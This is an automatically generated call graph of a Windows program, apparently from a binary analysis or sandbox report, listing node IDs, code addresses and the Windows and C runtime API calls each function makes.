108803->108788 108805 425783 108820 428b28 58 API calls __getptd_noexit 108805->108820 108806->108802 108806->108805 108807 425733 108806->108807 108811 425781 108806->108811 108819 4233a1 DecodePointer 108806->108819 108807->108806 108816 42a16b 58 API calls __NMSG_WRITE 108807->108816 108817 42a1c8 58 API calls 6 library calls 108807->108817 108818 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108807->108818 108821 428b28 58 API calls __getptd_noexit 108811->108821 108813->108788 108814->108792 108815->108794 108816->108807 108817->108807 108819->108806 108820->108811 108821->108803 108822->108799 108823->108803 108825 40818f 108824->108825 108828 4081aa 108824->108828 108973 407e4f 108825->108973 108827 408197 CharUpperBuffW 108827->108828 108828->108703 108830 40f251 108829->108830 108831 40f272 108830->108831 108977 469e4a 89 API calls 4 library calls 108830->108977 108831->108744 108834 40838d 108833->108834 108835 43edbd 108833->108835 108836 420db6 Mailbox 59 API calls 108834->108836 108837 408394 108836->108837 108838 4083b5 108837->108838 108978 408634 59 API calls Mailbox 108837->108978 108838->108721 108838->108726 108841 444cc3 108840->108841 108854 4109f5 108840->108854 109041 469e4a 89 API calls 4 library calls 108841->109041 108843 410cfa 108843->108752 108846 410ee4 108846->108843 108848 410ef1 108846->108848 108847 410a4b PeekMessageW 108902 410a05 Mailbox 108847->108902 109039 411093 341 API calls Mailbox 108848->109039 108851 410ef8 LockWindowUpdate DestroyWindow GetMessageW 108851->108843 108852 410f2a 108851->108852 108856 445c58 TranslateMessage DispatchMessageW GetMessageW 108852->108856 108853 410ce4 108853->108843 109038 411070 10 API calls Mailbox 108853->109038 108854->108902 109042 409e5d 60 API calls 108854->109042 109043 456349 341 API calls 108854->109043 108855 444e81 Sleep 108855->108902 108856->108856 108858 445c88 108856->108858 108858->108843 108859 444d50 TranslateAcceleratorW 108860 410e43 PeekMessageW 108859->108860 108859->108902 108860->108902 108861 410ea5 TranslateMessage DispatchMessageW 108861->108860 108862 44581f WaitForSingleObject 108865 44583c GetExitCodeProcess CloseHandle 108862->108865 108862->108902 108864 410d13 timeGetTime 108864->108902 108900 410f95 108865->108900 108866 410e5f Sleep 108901 410e70 Mailbox 108866->108901 108867 408047 59 API calls 108867->108902 108869 445af8 Sleep 108869->108901 108871 420db6 59 API calls Mailbox 108871->108902 108873 410f4e timeGetTime 109040 409e5d 60 API calls 108873->109040 108874 42049f timeGetTime 108874->108901 108877 445b8f GetExitCodeProcess 108880 445ba5 WaitForSingleObject 108877->108880 108881 445bbb CloseHandle 108877->108881 108879 40b7dd 109 API calls 108879->108901 108880->108881 108880->108902 108881->108901 108884 485f25 110 API calls 108884->108901 108885 445874 108885->108900 108886 409e5d 60 API calls 108886->108902 108887 445078 Sleep 108887->108902 108888 445c17 Sleep 108888->108902 108894 409ea0 314 API calls 108894->108902 108897 40fce0 314 API calls 108897->108902 108900->108752 108901->108874 108901->108877 108901->108879 108901->108884 108901->108885 108901->108887 108901->108888 108901->108900 108901->108902 109068 407667 108901->109068 109073 462408 60 API calls 108901->109073 109074 409e5d 60 API calls 108901->109074 109075 407de1 108901->109075 109079 4089b3 69 API calls Mailbox 108901->109079 109080 40b73c 341 API calls 108901->109080 109081 4564da 60 API calls 108901->109081 109082 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108901->109082 109083 463c55 66 API calls Mailbox 108901->109083 108902->108847 108902->108853 108902->108855 108902->108859 108902->108860 108902->108861 108902->108862 108902->108864 108902->108866 108902->108867 108902->108869 108902->108871 108902->108873 108902->108886 108902->108894 108902->108897 108902->108900 108902->108901 108903 407de1 59 API calls 108902->108903 108904 469e4a 89 API calls 108902->108904 108906 409c90 59 API calls Mailbox 108902->108906 108907 4084c0 69 API calls 108902->108907 108908 40b73c 314 API calls 108902->108908 108910 45617e 59 API calls Mailbox 108902->108910 108911 4089b3 69 API calls 108902->108911 108912 4455d5 VariantClear 108902->108912 108913 44566b VariantClear 108902->108913 108914 408cd4 59 API calls Mailbox 108902->108914 108915 445419 VariantClear 108902->108915 108916 456e8f 59 API calls 108902->108916 108979 40e420 108902->108979 108986 40e6a0 108902->108986 109017 40f460 108902->109017 109037 4031ce IsDialogMessageW GetClassLongW 108902->109037 109044 486018 59 API calls 108902->109044 109045 469a15 59 API calls Mailbox 108902->109045 109046 45d4f2 59 API calls 108902->109046 109047 409837 108902->109047 109065 4560ef 59 API calls 2 library calls 108902->109065 109066 408401 59 API calls 108902->109066 109067 4082df 59 API calls Mailbox 108902->109067 108903->108902 108904->108902 108906->108902 108907->108902 108908->108902 108910->108902 108911->108902 108912->108902 108913->108902 108914->108902 108915->108902 108916->108902 108917->108776 108918->108764 108919->108775 108920->108775 108922 409ebf 108921->108922 108943 409eed Mailbox 108921->108943 108923 420db6 Mailbox 59 API calls 108922->108923 108923->108943 108924 40b47a 108928 4409e5 108924->108928 108929 440055 108924->108929 108925 40b475 108926 408047 59 API calls 108925->108926 108927 40a057 108926->108927 108927->108744 110278 469e4a 89 API calls 4 library calls 108928->110278 110275 469e4a 89 API calls 4 library calls 108929->110275 108932 420db6 59 API calls Mailbox 108932->108943 108934 440064 108934->108744 108935 422d40 67 API calls __cinit 108935->108943 108937 407667 59 API calls 108937->108943 108939 408047 59 API calls 108939->108943 108940 456e8f 59 API calls 108940->108943 108941 4409d6 110277 469e4a 89 API calls 4 library calls 108941->110277 108943->108924 108943->108925 108943->108927 108943->108929 108943->108932 108943->108935 108943->108937 108943->108939 108943->108940 108943->108941 108944 40a55a 108943->108944 110273 40c8c0 341 API calls 2 library calls 108943->110273 110274 40b900 60 API calls Mailbox 108943->110274 110276 469e4a 89 API calls 4 library calls 108944->110276 108945->108764 108946->108706 108947->108709 108948->108716 108949->108709 108950->108709 108951->108717 108952->108727 108953->108728 108954->108728 108955->108731 108956->108735 108957->108775 108958->108775 108959->108775 108960->108775 108962 4084cb 108961->108962 108964 4084f2 108962->108964 110279 4089b3 69 API calls Mailbox 108962->110279 108964->108757 108965->108709 108966->108759 108968 408052 108967->108968 108969 40805a 108967->108969 110280 407f77 59 API calls 2 library calls 108968->110280 108969->108766 108971->108769 108972->108709 108974 407e62 108973->108974 108976 407e5f _memmove 108973->108976 108975 420db6 Mailbox 59 API calls 108974->108975 108975->108976 108976->108827 108977->108831 108978->108838 108980 40e451 108979->108980 108981 40e43d 108979->108981 109085 469e4a 89 API calls 4 library calls 108980->109085 109084 40df00 341 API calls 2 library calls 108981->109084 108984 40e448 108984->108902 108985 443aa4 108985->108985 108987 40e6d5 108986->108987 108988 443aa9 108987->108988 108991 40e73f 108987->108991 108995 40e799 108987->108995 108989 409ea0 341 API calls 108988->108989 108990 443abe 108989->108990 109016 40e970 Mailbox 108990->109016 109087 469e4a 89 API calls 4 library calls 108990->109087 108994 407667 59 API calls 108991->108994 108991->108995 108992 407667 59 API calls 108992->108995 108997 443b04 108994->108997 108995->108992 108996 422d40 __cinit 67 API calls 108995->108996 108998 443b26 108995->108998 109002 40e95a 108995->109002 108995->109016 108996->108995 109088 422d40 108997->109088 108998->108902 109000 4084c0 69 API calls 109000->109016 109001 409ea0 341 API calls 109001->109016 109002->109016 109091 469e4a 89 API calls 4 library calls 109002->109091 109003 469e4a 89 API calls 109003->109016 109005 408d40 59 API calls 109005->109016 109013 40f195 109095 469e4a 89 API calls 4 library calls 109013->109095 109014 443e25 109014->108902 109015 40ea78 109015->108902 109016->109000 109016->109001 109016->109003 109016->109005 109016->109013 109016->109015 109086 407f77 59 API calls 2 library calls 109016->109086 109092 456e8f 59 API calls 109016->109092 109093 47c5c3 341 API calls 109016->109093 109094 47b53c 341 API calls Mailbox 109016->109094 109096 409c90 59 API calls Mailbox 109016->109096 109097 4793c6 341 API calls Mailbox 109016->109097 109018 40f650 109017->109018 109019 40f4ba 109017->109019 109022 407de1 59 API calls 109018->109022 109020 40f4c6 109019->109020 109021 44441e 109019->109021 109283 40f290 341 API calls 2 library calls 109020->109283 109285 47bc6b 109021->109285 109025 40f58c Mailbox 109022->109025 109182 463c37 109025->109182 109185 47df37 109025->109185 109188 47445a 109025->109188 109197 46cb7a 109025->109197 109277 404e4a 109025->109277 109026 40f630 109026->108902 109027 44442c 109027->109026 109325 469e4a 89 API calls 4 library calls 109027->109325 109029 40f4fd 109029->109025 109029->109026 109029->109027 109031 40f5e3 109031->109026 109284 409c90 59 API calls Mailbox 109031->109284 109037->108902 109038->108846 109039->108851 109040->108902 109041->108854 109042->108854 109043->108854 109044->108902 109045->108902 109046->108902 109048 409851 109047->109048 109049 40984b 109047->109049 109050 43f5d3 __i64tow 109048->109050 109051 409899 109048->109051 109053 409857 __itow 109048->109053 109057 43f4da 109048->109057 109049->108902 110271 423698 83 API calls 4 library calls 109051->110271 109055 420db6 Mailbox 59 API calls 109053->109055 109056 409871 109055->109056 109056->109049 109059 407de1 59 API calls 109056->109059 109058 420db6 Mailbox 59 API calls 109057->109058 109063 43f552 Mailbox _wcscpy 109057->109063 109060 43f51f 109058->109060 109059->109049 109061 420db6 Mailbox 59 API calls 109060->109061 109062 43f545 109061->109062 109062->109063 109064 407de1 59 API calls 109062->109064 110272 423698 83 API calls 4 library calls 109063->110272 109064->109063 109065->108902 109066->108902 109067->108902 109069 420db6 Mailbox 59 API calls 109068->109069 109070 407688 109069->109070 109071 420db6 Mailbox 59 API calls 109070->109071 109072 407696 109071->109072 109072->108901 109073->108901 109074->108901 109076 407df0 __wsetenvp _memmove 109075->109076 109077 420db6 Mailbox 59 API calls 109076->109077 109078 407e2e 109077->109078 109078->108901 109079->108901 109080->108901 109081->108901 109082->108901 109083->108901 109084->108984 109085->108985 109086->109016 109087->109016 109098 422c44 109088->109098 109090 422d4b 109090->108995 109091->109016 109092->109016 109093->109016 109094->109016 109095->109014 109096->109016 109097->109016 109099 422c50 __close 109098->109099 109106 423217 109099->109106 109105 422c77 __close 109105->109090 109123 429c0b 109106->109123 109108 422c59 109109 422c88 DecodePointer DecodePointer 109108->109109 109110 422c65 109109->109110 109111 422cb5 109109->109111 109120 422c82 109110->109120 109111->109110 109175 4287a4 59 API calls 2 library calls 109111->109175 109113 422d18 EncodePointer EncodePointer 109113->109110 109114 422cec 109114->109110 109118 422d06 EncodePointer 109114->109118 109177 428864 61 API calls 2 library calls 109114->109177 109115 422cc7 109115->109113 109115->109114 109176 428864 61 API calls 2 library calls 109115->109176 109118->109113 109119 422d00 109119->109110 109119->109118 109178 423220 109120->109178 109124 429c2f EnterCriticalSection 109123->109124 109125 429c1c 109123->109125 109124->109108 109130 429c93 109125->109130 109127 429c22 109127->109124 109154 4230b5 58 API calls 3 library calls 109127->109154 109131 429c9f __close 109130->109131 109132 429cc0 109131->109132 109133 429ca8 109131->109133 109141 429ce1 __close 109132->109141 109158 42881d 109132->109158 109155 42a16b 58 API calls __NMSG_WRITE 109133->109155 109135 429cad 109156 42a1c8 58 API calls 6 library calls 109135->109156 109139 429ceb 109144 429c0b __lock 58 API calls 109139->109144 109140 429cdc 109164 428b28 58 API calls __getptd_noexit 109140->109164 109141->109127 109142 429cb4 109157 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109142->109157 109146 429cf2 109144->109146 109148 429d17 109146->109148 109149 429cff 109146->109149 109166 422d55 109148->109166 109165 429e2b InitializeCriticalSectionAndSpinCount 109149->109165 109152 429d0b 109172 429d33 LeaveCriticalSection _doexit 109152->109172 109155->109135 109156->109142 109159 42882b 109158->109159 109160 42571c __crtCompareStringA_stat 58 API calls 109159->109160 109161 42885d 109159->109161 109163 42883e 109159->109163 109160->109159 109161->109139 109161->109140 109163->109159 109163->109161 109173 42a132 Sleep 109163->109173 109164->109141 109165->109152 109167 422d5e RtlFreeHeap 109166->109167 109171 422d87 _free 109166->109171 109168 422d73 109167->109168 109167->109171 109174 428b28 58 API calls __getptd_noexit 109168->109174 109170 422d79 GetLastError 109170->109171 109171->109152 109172->109141 109173->109163 109174->109170 109175->109115 109176->109114 109177->109119 109181 429d75 LeaveCriticalSection 109178->109181 109180 422c87 109180->109105 109181->109180 109326 46445a GetFileAttributesW 109182->109326 109330 47cadd 109185->109330 109187 47df47 109187->109031 109189 409837 84 API calls 109188->109189 109190 474494 109189->109190 109462 406240 109190->109462 109192 4744a4 109193 4744c9 109192->109193 109194 409ea0 341 API calls 109192->109194 109196 4744cd 109193->109196 109487 409a98 59 API calls Mailbox 109193->109487 109194->109193 109196->109031 109198 407667 59 API calls 109197->109198 109199 46cbaf 109198->109199 109200 407667 59 API calls 109199->109200 109201 46cbb8 109200->109201 109202 46cbcc 109201->109202 109703 409b3c 59 API calls 109201->109703 109204 409837 84 API calls 109202->109204 109205 46cbe9 109204->109205 109206 46ccea 109205->109206 109207 46cc0b 109205->109207 109212 46cd1a Mailbox 109205->109212 109507 404ddd 109206->109507 109208 409837 84 API calls 109207->109208 109210 46cc17 109208->109210 109213 408047 59 API calls 109210->109213 109212->109031 109217 46cc23 109213->109217 109214 407667 59 API calls 109216 46cd4b 109214->109216 109215 404ddd 136 API calls 109218 46cd16 109215->109218 109219 407667 59 API calls 109216->109219 109221 46cc37 109217->109221 109222 46cc69 109217->109222 109218->109212 109218->109214 109220 46cd54 109219->109220 109224 407667 59 API calls 109220->109224 109225 408047 59 API calls 109221->109225 109223 409837 84 API calls 109222->109223 109226 46cc76 109223->109226 109227 46cd5d 109224->109227 109228 46cc47 109225->109228 109229 408047 59 API calls 109226->109229 109230 407667 59 API calls 109227->109230 109704 407cab 109228->109704 109233 46cc82 109229->109233 109234 46cd66 109230->109234 109711 464a31 GetFileAttributesW 109233->109711 109237 409837 84 API calls 109234->109237 109235 409837 84 API calls 109238 46cc5d 109235->109238 109240 46cd73 109237->109240 109241 407b2e 59 API calls 109238->109241 109239 46cc8b 109242 46cc9e 109239->109242 109245 4079f2 59 API calls 109239->109245 109531 40459b 109240->109531 109241->109222 109244 409837 84 API calls 109242->109244 109252 46cca4 109242->109252 109247 46cccb 109244->109247 109245->109242 109246 46cd8e 109582 4079f2 109246->109582 109712 4637ef 75 API calls Mailbox 109247->109712 109251 46cdd1 109254 408047 59 API calls 109251->109254 109252->109212 109253 4079f2 59 API calls 109255 46cdae 109253->109255 109256 46cddf 109254->109256 109255->109251 109713 407bcc 109255->109713 109585 407b2e 109256->109585 109260 46cdc3 109262 407bcc 59 API calls 109260->109262 109261 407b2e 59 API calls 109263 46cdfb 109261->109263 109262->109251 109264 407b2e 59 API calls 109263->109264 109265 46ce09 109264->109265 109266 409837 84 API calls 109265->109266 109267 46ce15 109266->109267 109594 464071 109267->109594 109269 46ce26 109270 463c37 3 API calls 109269->109270 109271 46ce30 109270->109271 109272 409837 84 API calls 109271->109272 109276 46ce61 109271->109276 109273 46ce4e 109272->109273 109648 469155 109273->109648 109275 404e4a 84 API calls 109275->109212 109276->109275 109278 404e54 109277->109278 109280 404e5b 109277->109280 109279 4253a6 __fcloseall 83 API calls 109278->109279 109279->109280 109281 404e6a 109280->109281 109282 404e7b FreeLibrary 109280->109282 109281->109031 109282->109281 109283->109029 109284->109031 109286 47bc96 109285->109286 109287 47bcb0 109285->109287 110263 469e4a 89 API calls 4 library calls 109286->110263 110264 47a213 59 API calls Mailbox 109287->110264 109290 47bcbb 109291 409ea0 340 API calls 109290->109291 109292 47bd1c 109291->109292 109293 47bca8 Mailbox 109292->109293 109294 47bdae 109292->109294 109297 47bd5d 109292->109297 109293->109027 109295 47be04 109294->109295 109296 47bdb4 109294->109296 109295->109293 109298 409837 84 API calls 109295->109298 110266 46791a 59 API calls 109296->110266 110265 4672df 59 API calls Mailbox 109297->110265 109299 47be16 109298->109299 109302 407e4f 59 API calls 109299->109302 109305 47be3a CharUpperBuffW 109302->109305 109303 47bdd7 110267 405d41 59 API calls Mailbox 109303->110267 109304 47bd8d 109307 40f460 340 API calls 109304->109307 109309 47be54 109305->109309 109307->109293 109308 47bddf Mailbox 109312 40fce0 340 API calls 109308->109312 109310 47bea7 109309->109310 109311 47be5b 109309->109311 109313 409837 84 API calls 109310->109313 110268 4672df 59 API calls Mailbox 109311->110268 109312->109293 109314 47beaf 109313->109314 110269 409e5d 60 API calls 109314->110269 109317 47be89 109318 40f460 340 API calls 109317->109318 109318->109293 109319 47beb9 109319->109293 109320 409837 84 API calls 109319->109320 109321 47bed4 109320->109321 110270 405d41 59 API calls Mailbox 109321->110270 109323 47bee4 109324 40fce0 340 API calls 109323->109324 109324->109293 109325->109026 109327 463c3e 109326->109327 109328 464475 FindFirstFileW 109326->109328 109327->109031 109328->109327 109329 46448a FindClose 109328->109329 109329->109327 109331 409837 84 API calls 109330->109331 109332 47cb1a 109331->109332 109349 47cb61 Mailbox 109332->109349 109368 47d7a5 109332->109368 109334 47cdb9 109335 47cf2e 109334->109335 109339 47cdc7 109334->109339 109418 47d8c8 92 API calls Mailbox 109335->109418 109338 47cf3d 109338->109339 109341 47cf49 109338->109341 109381 47c96e 109339->109381 109340 409837 84 API calls 109352 47cbb2 Mailbox 109340->109352 109341->109349 109346 47ce00 109396 420c08 109346->109396 109349->109187 109350 47ce33 109403 4092ce 109350->109403 109351 47ce1a 109402 469e4a 89 API calls 4 library calls 109351->109402 109352->109334 109352->109340 109352->109349 109400 47fbce 59 API calls 2 library calls 109352->109400 109401 47cfdf 61 API calls 2 library calls 109352->109401 109355 47ce25 GetCurrentProcess TerminateProcess 109355->109350 109360 47cfa4 109360->109349 109364 47cfb8 FreeLibrary 109360->109364 109361 47ce6b 109415 47d649 107 API calls _free 109361->109415 109364->109349 109366 47ce7c 109366->109360 109416 408d40 59 API calls Mailbox 109366->109416 109417 409d3c 60 API calls Mailbox 109366->109417 109419 47d649 107 API calls _free 109366->109419 109369 407e4f 59 API calls 109368->109369 109370 47d7c0 CharLowerBuffW 109369->109370 109420 45f167 109370->109420 109374 407667 59 API calls 109375 47d7f9 109374->109375 109427 40784b 109375->109427 109377 47d810 109440 407d2c 109377->109440 109379 47d81c Mailbox 109380 47d858 Mailbox 109379->109380 109444 47cfdf 61 API calls 2 library calls 109379->109444 109380->109352 109382 47c989 109381->109382 109386 47c9de 109381->109386 109383 420db6 Mailbox 59 API calls 109382->109383 109384 47c9ab 109383->109384 109385 420db6 Mailbox 59 API calls 109384->109385 109384->109386 109385->109384 109387 47da50 109386->109387 109388 47dc79 Mailbox 109387->109388 109395 47da73 _strcat _wcscpy __wsetenvp 109387->109395 109388->109346 109389 409be6 59 API calls 109389->109395 109390 409b3c 59 API calls 109390->109395 109391 409b98 59 API calls 109391->109395 109392 409837 84 API calls 109392->109395 109393 42571c 58 API calls __crtCompareStringA_stat 109393->109395 109395->109388 109395->109389 109395->109390 109395->109391 109395->109392 109395->109393 109451 465887 61 API calls 2 library calls 109395->109451 109398 420c1d 109396->109398 109397 420cb5 VirtualProtect 109399 420c83 109397->109399 109398->109397 109398->109399 109399->109350 109399->109351 109400->109352 109401->109352 109402->109355 109404 4092d6 109403->109404 109405 420db6 Mailbox 59 API calls 109404->109405 109406 4092e4 109405->109406 109408 4092f0 109406->109408 109452 4091fc 59 API calls Mailbox 109406->109452 109409 409050 109408->109409 109453 409160 109409->109453 109411 40905f 109412 420db6 Mailbox 59 API calls 109411->109412 109413 4090fb 109411->109413 109412->109413 109413->109366 109414 408d40 59 API calls Mailbox 109413->109414 109414->109361 109415->109366 109416->109366 109417->109366 109418->109338 109419->109366 109422 45f192 __wsetenvp 109420->109422 109421 45f1d1 109421->109374 109421->109379 109422->109421 109423 45f1c7 109422->109423 109425 45f278 109422->109425 109423->109421 109445 4078c4 61 API calls 109423->109445 109425->109421 109446 4078c4 61 API calls 109425->109446 109428 4078b7 109427->109428 109429 40785a 109427->109429 109431 407d2c 59 API calls 109428->109431 109429->109428 109430 407865 109429->109430 109432 407880 109430->109432 109433 43eb09 109430->109433 109437 407888 _memmove 109431->109437 109447 407f27 59 API calls Mailbox 109432->109447 109448 408029 109433->109448 109436 43eb13 109438 420db6 Mailbox 59 API calls 109436->109438 109437->109377 109439 43eb33 109438->109439 109441 407d3a 109440->109441 109443 407d43 _memmove 109440->109443 109442 407e4f 59 API calls 109441->109442 109441->109443 109442->109443 109443->109379 109444->109380 109445->109423 109446->109425 109447->109437 109449 420db6 Mailbox 59 API calls 109448->109449 109450 408033 109449->109450 109450->109436 109451->109395 109452->109408 109454 409169 Mailbox 109453->109454 109455 43f19f 109454->109455 109459 409173 109454->109459 109456 420db6 Mailbox 59 API calls 109455->109456 109458 43f1ab 109456->109458 109457 40917a 109457->109411 109459->109457 109461 409c90 59 API calls Mailbox 109459->109461 109461->109459 109488 407a16 109462->109488 109464 40646a 109495 40750f 109464->109495 109466 406484 Mailbox 109466->109192 109469 43dff6 109505 45f8aa 91 API calls 4 library calls 109469->109505 109470 40750f 59 API calls 109481 406265 109470->109481 109474 407d8c 59 API calls 109474->109481 109475 43e004 109476 40750f 59 API calls 109475->109476 109478 43e01a 109476->109478 109477 406799 _memmove 109506 45f8aa 91 API calls 4 library calls 109477->109506 109478->109466 109479 43df92 109480 408029 59 API calls 109479->109480 109483 43df9d 109480->109483 109481->109464 109481->109469 109481->109470 109481->109474 109481->109477 109481->109479 109484 407e4f 59 API calls 109481->109484 109493 405f6c 60 API calls 109481->109493 109494 405d41 59 API calls Mailbox 109481->109494 109503 405e72 60 API calls 109481->109503 109504 407924 59 API calls 2 library calls 109481->109504 109486 420db6 Mailbox 59 API calls 109483->109486 109485 40643b CharUpperBuffW 109484->109485 109485->109481 109486->109477 109487->109196 109489 420db6 Mailbox 59 API calls 109488->109489 109490 407a3b 109489->109490 109491 408029 59 API calls 109490->109491 109492 407a4a 109491->109492 109492->109481 109493->109481 109494->109481 109496 407522 _memmove 109495->109496 109497 4075af 109495->109497 109498 420db6 Mailbox 59 API calls 109496->109498 109499 420db6 Mailbox 59 API calls 109497->109499 109501 407529 109498->109501 109499->109496 109500 407552 109500->109466 109501->109500 109502 420db6 Mailbox 59 API calls 109501->109502 109502->109500 109503->109481 109504->109481 109505->109475 109506->109466 109722 404bb5 109507->109722 109512 43d8e6 109515 404e4a 84 API calls 109512->109515 109513 404e08 LoadLibraryExW 109732 404b6a 109513->109732 109517 43d8ed 109515->109517 109519 404b6a 3 API calls 109517->109519 109521 43d8f5 109519->109521 109520 404e2f 109520->109521 109522 404e3b 109520->109522 109758 404f0b 109521->109758 109523 404e4a 84 API calls 109522->109523 109525 404e40 109523->109525 109525->109215 109525->109218 109528 43d91c 109766 404ec7 109528->109766 109532 407667 59 API calls 109531->109532 109533 4045b1 109532->109533 109534 407667 59 API calls 109533->109534 109535 4045b9 109534->109535 109536 407667 59 API calls 109535->109536 109537 4045c1 109536->109537 109538 407667 59 API calls 109537->109538 109539 4045c9 109538->109539 109540 43d4d2 109539->109540 109541 4045fd 109539->109541 109542 408047 59 API calls 109540->109542 109543 40784b 59 API calls 109541->109543 109544 43d4db 109542->109544 109545 40460b 109543->109545 109940 407d8c 109544->109940 109547 407d2c 59 API calls 109545->109547 109548 404615 109547->109548 109549 404640 109548->109549 109550 40784b 59 API calls 109548->109550 109551 404680 109549->109551 109552 40465f 109549->109552 109564 43d4fb 109549->109564 109553 404636 109550->109553 109554 40784b 59 API calls 109551->109554 109557 4079f2 59 API calls 109552->109557 109556 407d2c 59 API calls 109553->109556 109558 404691 109554->109558 109555 43d5cb 109560 407bcc 59 API calls 109555->109560 109556->109549 109561 404669 109557->109561 109559 4046a3 109558->109559 109562 408047 59 API calls 109558->109562 109563 4046b3 109559->109563 109565 408047 59 API calls 109559->109565 109577 43d588 109560->109577 109561->109551 109568 40784b 59 API calls 109561->109568 109562->109559 109567 4046ba 109563->109567 109569 408047 59 API calls 109563->109569 109564->109555 109566 43d5b4 109564->109566 109575 43d532 109564->109575 109565->109563 109566->109555 109571 43d59f 109566->109571 109570 408047 59 API calls 109567->109570 109579 4046c1 Mailbox 109567->109579 109568->109551 109569->109567 109570->109579 109574 407bcc 59 API calls 109571->109574 109572 43d590 109573 407bcc 59 API calls 109572->109573 109573->109577 109574->109577 109575->109572 109580 43d57b 109575->109580 109576 4079f2 59 API calls 109576->109577 109577->109551 109577->109576 109944 407924 59 API calls 2 library calls 109577->109944 109579->109246 109581 407bcc 59 API calls 109580->109581 109581->109577 109583 407e4f 59 API calls 109582->109583 109584 4079fd 109583->109584 109584->109251 109584->109253 109586 407b40 109585->109586 109587 43ec6b 109585->109587 109945 407a51 109586->109945 109951 457bdb 59 API calls _memmove 109587->109951 109590 43ec75 109592 408047 59 API calls 109590->109592 109591 407b4c 109591->109261 109593 43ec7d Mailbox 109592->109593 109595 46408d 109594->109595 109596 464092 109595->109596 109597 4640a0 109595->109597 109598 408047 59 API calls 109596->109598 109599 407667 59 API calls 109597->109599 109600 46409b Mailbox 109598->109600 109601 4640a8 109599->109601 109600->109269 109602 407667 59 API calls 109601->109602 109603 4640b0 109602->109603 109604 407667 59 API calls 109603->109604 109605 4640bb 109604->109605 109606 407667 59 API calls 109605->109606 109607 4640c3 109606->109607 109608 407667 59 API calls 109607->109608 109609 4640cb 109608->109609 109610 407667 59 API calls 109609->109610 109611 4640d3 109610->109611 109612 407667 59 API calls 109611->109612 109613 4640db 109612->109613 109614 407667 59 API calls 109613->109614 109615 4640e3 109614->109615 109616 40459b 59 API calls 109615->109616 109617 4640fa 109616->109617 109618 40459b 59 API calls 109617->109618 109619 464113 109618->109619 109620 4079f2 59 API calls 109619->109620 109621 46411f 109620->109621 109622 464132 109621->109622 109623 407d2c 59 API calls 109621->109623 109624 4079f2 59 API calls 109622->109624 109623->109622 109625 46413b 109624->109625 109626 46414b 109625->109626 109627 407d2c 59 API calls 109625->109627 109627->109626 109649 469162 __ftell_nolock 109648->109649 109650 420db6 Mailbox 59 API calls 109649->109650 109651 4691bf 109650->109651 109652 40522e 59 API calls 109651->109652 109653 4691c9 109652->109653 109654 468f5f GetSystemTimeAsFileTime 109653->109654 109655 4691d4 109654->109655 109656 404ee5 85 API calls 109655->109656 109657 4691e7 _wcscmp 109656->109657 109658 46920b 109657->109658 109659 4692b8 109657->109659 109984 469734 109658->109984 109661 469734 96 API calls 109659->109661 109677 469284 _wcscat 109661->109677 109664 404f0b 74 API calls 109666 4692dd 109664->109666 109665 4692c1 109665->109276 109667 404f0b 74 API calls 109666->109667 109669 4692ed 109667->109669 109668 469239 _wcscat _wcscpy 109991 4240fb 58 API calls __wsplitpath_helper 109668->109991 109670 404f0b 74 API calls 109669->109670 109672 469308 109670->109672 109677->109664 109677->109665 109703->109202 109705 43ed4a 109704->109705 109706 407cbf 109704->109706 109707 408029 59 API calls 109705->109707 110257 407c50 109706->110257 109709 43ed55 __wsetenvp _memmove 109707->109709 109710 407cca 109710->109235 109711->109239 109712->109252 109714 407c45 109713->109714 109715 407bd8 __wsetenvp 109713->109715 109716 407d2c 59 API calls 109714->109716 109717 407c13 109715->109717 109718 407bee 109715->109718 109721 407bf6 _memmove 109716->109721 109720 408029 59 API calls 109717->109720 110262 407f27 59 API calls Mailbox 109718->110262 109720->109721 109721->109260 109771 404c03 109722->109771 109725 404bdc 109726 404bf5 109725->109726 109727 404bec FreeLibrary 109725->109727 109729 42525b 109726->109729 109727->109726 109728 404c03 2 API calls 109728->109725 109775 425270 109729->109775 109731 404dfc 109731->109512 109731->109513 109855 404c36 109732->109855 109735 404ba1 FreeLibrary 109736 404baa 109735->109736 109739 404c70 109736->109739 109737 404c36 2 API calls 109738 404b8f 109737->109738 109738->109735 109738->109736 109740 420db6 Mailbox 59 API calls 109739->109740 109741 404c85 109740->109741 109859 40522e 109741->109859 109743 404c91 _memmove 109745 404dc1 109743->109745 109746 404d89 109743->109746 109749 404ccc 109743->109749 109744 404ec7 69 API calls 109755 404cd5 109744->109755 109873 46991b 95 API calls 109745->109873 109862 404e89 CreateStreamOnHGlobal 109746->109862 109749->109744 109750 404f0b 74 API calls 109750->109755 109752 404d69 109752->109520 109753 43d8a7 109754 404ee5 85 API calls 109753->109754 109756 43d8bb 109754->109756 109755->109750 109755->109752 109755->109753 109868 404ee5 109755->109868 109757 404f0b 74 API calls 109756->109757 109757->109752 109759 404f1d 109758->109759 109760 43d9cd 109758->109760 109897 4255e2 109759->109897 109763 469109 109917 468f5f 109763->109917 109765 46911f 109765->109528 109767 43d990 109766->109767 109768 404ed6 109766->109768 109922 425c60 109768->109922 109770 404ede 109772 404bd0 109771->109772 109773 404c0c LoadLibraryA 109771->109773 109772->109725 109772->109728 109773->109772 109774 404c1d GetProcAddress 109773->109774 109774->109772 109778 42527c __close 109775->109778 109776 42528f 109824 428b28 58 API calls __getptd_noexit 109776->109824 109778->109776 109780 4252c0 109778->109780 109779 425294 109825 428db6 9 API calls ___crtsetenv 109779->109825 109794 4304e8 109780->109794 109783 4252c5 109784 4252db 109783->109784 109785 4252ce 109783->109785 109787 425305 109784->109787 109788 4252e5 109784->109788 109826 428b28 58 API calls __getptd_noexit 109785->109826 109809 430607 109787->109809 109827 428b28 58 API calls __getptd_noexit 109788->109827 109789 42529f __close @_EH4_CallFilterFunc@8 109789->109731 109795 4304f4 __close 109794->109795 109796 429c0b __lock 58 API calls 109795->109796 109797 430502 109796->109797 109798 43057d 109797->109798 109803 429c93 __mtinitlocknum 58 API calls 109797->109803 109807 430576 109797->109807 109832 426c50 59 API calls __lock 109797->109832 109833 426cba LeaveCriticalSection LeaveCriticalSection _doexit 109797->109833 109800 42881d __malloc_crt 58 API calls 109798->109800 109801 430584 109800->109801 109801->109807 109834 429e2b InitializeCriticalSectionAndSpinCount 109801->109834 109803->109797 109805 4305f3 __close 109805->109783 109806 4305aa EnterCriticalSection 109806->109807 109829 4305fe 109807->109829 109817 430627 __wopenfile 109809->109817 109810 430641 109839 428b28 58 API calls __getptd_noexit 109810->109839 109812 430646 109840 428db6 9 API calls ___crtsetenv 